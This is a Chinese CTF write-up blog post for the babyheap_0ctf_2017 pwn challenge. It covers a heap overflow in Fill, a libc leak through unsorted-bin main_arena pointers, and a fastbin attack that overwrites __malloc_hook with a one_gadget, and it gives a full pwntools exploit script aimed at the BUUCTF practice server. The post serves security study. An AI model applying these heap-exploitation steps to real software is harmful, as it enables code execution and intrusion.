babyheap_0ctf_2017

最新推荐文章于 2023-06-18 19:18:34 发布
最新推荐文章于 2023-06-18 19:18:34 发布
阅读量508 收藏 2
点赞数 1
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121531333
版权

babyheap_0ctf_2017

使用checksec查看:
在这里插入图片描述
保护全开,看到PIE的时候就想到需要泄露libc_base_addr

拉进IDA中看吧:
在这里插入图片描述
一个死循环,主要功能AllocateFillFreeDump,这边我已经修改函数名了,接下来一个一个看

首先是创建堆:
在这里插入图片描述
最多创建15个chunk、每个chunk的最大size是4096

*(0x18LL * i + a1) = 1;创建chunk时给了标志1

接着是编辑堆内容:
在这里插入图片描述
判断了标志存不存在,若chunk存在,让用户输入size存放到v3变量中。

漏洞点就出在这,v3的大小并没有进行判断,导致可以堆溢出,进行下个堆的修改。

接着的Free()函数和Dump()函数都是中规中矩的。这里就不贴图了。

首先根据每个函数写出对应得操作函数:

def allocate(size):
    r.recvuntil('Command: ')
    r.sendline('1')
    r.sendline(str(size))

def fill(idx,payload):
    r.recvuntil('Command: ')
    r.sendline('2') 
    r.sendline(str(idx))
    r.sendline(str(len(payload)))
    r.send(payload) 
    
def free(idx):
    r.recvuntil('Command: ')
    r.sendline('3')
    r.sendline(str(idx))   
    
def dump(idx):
    r.recvuntil('Command: ') 
    r.sendline('4')
    r.sendline(str(idx))    
    r.recvuntil('Content: \n')

因为程序开启了PIE,所以我们需要先泄露程序的libc_base_addr

通过unsortedbin的特性,若unsortedbin中只有一个chunk的时候,这个chunk的fd和bk指针存放的都是main_arena+88,通过main_arena我们就可以获取到libc的基地址。

首先创建三个chunk,最后一个要大于0x80,等会儿通过这个chunk获取mian_arena地址
allocate(0x60)#0
allocate(0x40)#1
allocate(0x100)#2

创建完成之后,heap如下:
在这里插入图片描述
在这里插入图片描述
通过堆溢出,修改chunk0时修改chunk1伪造出一个fake_chunk,使fake_chunk能够覆盖到chunk2的fd和bk指针处。

fill(0,0x60*b'M'+p64(0)+p64(0x71))

修改完之后堆空间布局如下:

此时fake_chunk还不完整,我们还需通过修改chunk2将这个fake_chunk补充完整:

fill(2,0x10*b'M'+p64(0)+p64(0x71))

修改完之后堆空间布局如下:
在这里插入图片描述
接着free掉chunk1再申请0x60大小的chunk就能将,chunk2的fd和bk指针所在的地址给带出来了。

本题使用的是calloc()来创建chunk,创建时会将chunk内的有数据清零,所以我们还需要将原来的chunk2给还原回去:

fill(1,0x40*b'M'+p64(0)+p64(0x111))

还原之后的堆布局如下:
在这里插入图片描述
这里还需要注意的是,为了防止unsortedbin粘连,我们还需要申请一个chunk。

最后只需free chunk2、dump chunk1就能获取到main_arena+88的地址了。
在这里插入图片描述
在pwndbg中输入libc可以查看到调试的时候的libc的地址:
在这里插入图片描述
计算公式是:libc_base = main_arena - offest

计算出offest = 0x3C 3B78 这样打远程的时候就可以计算出libc_base_addr

leak出了libc base ,接着通过 改malloc_hookone_gadget 即可成功getshell
找到malloc_hook 地址,寻找满足fastbin 对齐检查的fake chunk addr ,计算malloc_hook距离该fake chunk addr的offset 。溢出chunk0 修改 chunk1的fd指向该fake chunk addr 多次申请堆块 成功在此处申请到chunk。
在这里插入图片描述
在这里插入图片描述

exp:

from pwn import *

#start
# r = process("../buu/babyheap_0ctf_2017")
r = remote("node4.buuoj.cn",28184)

#params
def allocate(size):
    r.recvuntil('Command: ')
    r.sendline('1')
    r.sendline(str(size))

def fill(idx,payload):
    r.recvuntil('Command: ')
    r.sendline('2') 
    r.sendline(str(idx))
    r.sendline(str(len(payload)))
    r.send(payload) 
    
def free(idx):
    r.recvuntil('Command: ')
    r.sendline('3')
    r.sendline(str(idx))   
    
def dump(idx):
    r.recvuntil('Command: ') 
    r.sendline('4')
    r.sendline(str(idx))    
    r.recvuntil('Content: \n')


#libc
gdb.attach(r,"b *$rebase(0x114D)")
allocate(0x60)#0
allocate(0x40)#1
allocate(0x100)#2
fill(0,0x60*b'M'+p64(0)+p64(0x71))
fill(2,0x10*b'M'+p64(0)+p64(0x71))
free(1)
allocate(0x60)
fill(1,0x40*b'M'+p64(0)+p64(0x111))
allocate(0x100)#3 防粘连
free(2)
dump(1)
# gdb.attach(r)
main_arena = u64(r.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
libc_base = main_arena - 0x3c4b78

#attack
malloc_hook = main_arena-0x68
fake_chunk = malloc_hook-0x23
free(1)
fill(0,b"M"*0x60 + p64(0) + p64(0x71) + p64(fake_chunk) + p64(0))
allocate(0x60)
allocate(0x60)

fill(2,b'M'*3 + p64(0) + p64(0) + p64(libc_base + 0x4526a))
allocate(0x100)

r.interactive()
m0sway
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
welcome_CTF.exe
08-07
一道简单的ctf逆向题目,取自于成信大2019四叶草安全杯比赛
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3732
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2730
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
babyheap_0ctf_2017 详解
Bi0x的博客
11-24 1605
题目地址: https://buuoj.cn/challenges#babyheap_0ctf_2017 本题为 64 位,以下内容以64位为例 信息收集 弄到题目文件先 checksec 保护全开,那必然就要想办法泄漏出 libc 基地址的偏移量来实现调用其他函数 先逆向一下文件,对于 main 函数大概的构造情况如下 对于 allocate 函数,里面用户输入 size 后根据其大小进行内存分配 这里使用了 calloc函数,其与malloc不同的是分配内存后会把数据.
我又pwn啦——*刷题篇 babyheap_0ctf_2017
m0_64195960的博客
07-28 622
babyheap
0ctf Babyheap 2017
Bill
03-11 6356
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF神器_ctf
09-23
对网站文件管理,对网站后台文件进行扫描。。
test_ctf_
09-30
学习java时跟着老师敲的代码,可以帮到一部分初学者
2017 0ctf babyheap
Grxer的博客
03-21 120
刚开始的init_my会利用/dev/urandom随机函数用mmap随机映射一块内存给我们存放指针,没有了确定地址,我们就不好去构成unlink攻击allocate()根据我们输入的size构成如下一个结构体,把指针放在mmap的堆上fill()也会根据我们的size进行读写,任意堆溢出,这就好办了freechunk()挺好的,该置零的都置零。
[BUUCTF]PWN——babyheap_0ctf_2017
mcmuyanga的博客
12-23 2567
[BUUCTF]PWN19——babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个视频,我也刚接触堆不久,有些地方我也讲不清楚 ida载入,先看一下main函数,做堆题的时候需要将程序给理清楚了,这边的几个选项函数一开始不是如图所示的,我们可以右击给他重新命名一下,为了让我们看的更清楚 add,就是简单的创建一个chunk edit,我们写入数据的长度是我们可以自己控制的,存在堆
0ctfbabyheap2017WP——堆溢出fastbin attack初探
GeekCmore的博客
02-18 453
从栈溢出进入堆溢出,漏洞利用的复杂度上了一个大台阶,主要是因为 ptmalloc 内存管理器对于堆管理设计了复杂的数据结构和算法,要想进入堆溢出的学习,就必须厘清它们之间的关系。本文将从一个经典的例子——0ctfbabyheap2017 来介绍一个初级的 fastbin attack 以初探堆溢出攻击。
actf_2019_babyheap题解析
qq_29317353的博客
06-18 257
再次创建一个0x10大小的堆块,会从fastbin里面拿出一个0x10大小的堆块就是index3会覆盖掉index0的地址根据malloc的分配机制,所以把函数的指针改为system把content的指针改成/bin/sh就完成了UAF漏洞利用的一个过程。struct chunk是0x10的堆结构体,content chunk是用来存放数据的。查看printf_out,发现利用点。思路创键3给堆块,大小相同,防止合并。由于是UAF漏洞先看,free。看看分配堆块的地方,看注释。mian函数分析,见注释。
攻防世界PWNBabyheap(null off by one)题解
seaaseesa的博客
11-20 2036
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
0ctf2018-babyheap调试记录fastbin-attack,off-by-one
weixin_30596165的博客
11-03 104
查看文件格式以及保护开启情况。发现为64位程序,符号被剥离,动态链接程序且题目提供给了libc。保护全开,猜想可能是fast attack加上malloc_hook利用(毕竟去年这题是这个利用,肯定先往这边想) 简单的运行程序,发现是常规的菜单类题目,功能有申请内存(alloc)、更新(update)、删除(delete)、查看(view)、退出。我们每个功能走...
0ctf_2017_babyheap
u014377094的博客
03-10 456
本人double free+fastbin攻击第一道题,看了两天,好在理解下来不难。 参考传送门[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com 惯例checksec一下 打开ida 1创建chunk,按1,2依次创建,2往里写,3free掉指定数字chunk,4print出指定chunk内容 不建议跟ida里一些函数死磕,硬读会恶心到,理解就ok。 这里先放exp,读一遍exp咱们再来解释 from pwn import
x_ctf_b0verfl0w
最新发布
10-22
x_ctf_b0verfl0w是一道栈溢出的题目,需要利用栈溢出漏洞来实现攻击。攻击者需要构造一个ROP链,通过泄露puts函数的地址,计算libc的基地址,然后再通过libc中的system函数和/bin/sh字符串的地址来执行系统命令。在这个过程中,还需要利用到一个jmp esp的gadget,用于跳转到栈上的shellcode执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值